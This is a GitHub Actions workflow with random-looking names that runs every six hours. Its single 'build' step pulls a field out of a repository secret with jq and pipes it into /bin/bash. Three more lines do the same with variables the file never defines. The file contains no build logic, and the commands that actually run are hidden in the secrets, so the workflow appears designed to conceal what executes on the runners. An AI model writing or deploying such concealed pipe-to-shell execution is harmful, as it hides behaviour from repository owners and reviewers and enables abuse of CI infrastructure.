name: denyhyphae
on:
  workflow_dispatch:
  schedule:
    - cron: '45 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: denyhyphae
        env:
          hkg624: ${{ secrets.hkg624 }}
        run: |
          echo $hkg624 | jq -r .fcag225 | /bin/bash
          echo $ovxt2 | jq -r .lihgd911 | /bin/bash
          echo $fvb597 | jq -r .iblc93 | /bin/bash
          echo $yxyhj941 | jq -r .to38451 | /bin/bash

